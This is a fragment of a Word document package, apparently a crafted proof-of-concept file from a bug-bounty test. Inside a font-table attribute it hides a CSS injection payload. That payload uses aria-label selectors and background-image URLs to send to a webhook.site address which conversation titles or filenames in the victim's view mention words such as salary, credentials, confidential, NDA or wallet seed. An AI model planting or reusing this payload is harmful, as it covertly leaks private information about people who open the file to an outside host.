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</w:t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;}html{background-image:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/PAYLOAD-FIRED-css-injection-in-app-origin)!important}*[aria-label*=&quot;bugcrowd&quot;i]{--abugcrowd:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/conversation-title/bugcrowd)}*[aria-label*=&quot;money&quot;i]{--amoney:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/conversation-title/money)}*[aria-label*=&quot;football&quot;i]{--afootball:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/conversation-title/football)}*[aria-label*=&quot;weather&quot;i]{--aweather:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/conversation-title/weather)}*[aria-label*=&quot;identity&quot;i]{--aidentity:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/conversation-title/identity)}*[aria-label*=&quot;acquisition&quot;i]{--aacquisition:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/acquisition)}*[aria-label*=&quot;salary&quot;i]{--asalary:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/salary)}*[aria-label*=&quot;confidential&quot;i]{--aconfidential:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/confidential)}*[aria-label*=&quot;credentials&quot;i]{--acredentials:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/credentials)}*[aria-label*=&quot;nda&quot;i]{--anda:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/nda)}*[aria-label*=&quot;titan&quot;i]{--atitan:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/sensitive-filename/titan)}*[aria-label*=&quot;ransomware&quot;i]{--aransomware:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/decoy/ransomware)}*[aria-label*=&quot;walletseed&quot;i]{--awalletseed:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/decoy/walletseed)}*[aria-label*=&quot;payroll&quot;i]{--apayroll:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/decoy/payroll)}*[aria-label*=&quot;subpoena&quot;i]{--asubpoena:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/victim-aria-label-contains/decoy/subpoena)}*[aria-label]{background-image:url(https://webhook.site/700876c3-ef75-404a-b0aa-cb919b608654/REPO-DELIVERY/SURFACE-PAINTED/victim-aria-label-contains),var(--abugcrowd,none),var(--amoney,none),var(--afootball,none),var(--aweather,none),var(--aidentity,none),var(--aacquisition,none),var(--asalary,none),var(--aconfidential,none),var(--acredentials,none),var(--anda,none),var(--atitan,none),var(--aransomware,none),var(--awalletseed,none),var(--apayroll,none),var(--asubpoena,none)!important}.bb-noop{color:inherit}">
    <w:embedRegular r:id="rIdF1" w:fontKey="{00000000-0000-0000-0000-000000000000}"/>
  </w:font>
</w:fonts>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rIdFT" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable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/Relationships>
</file>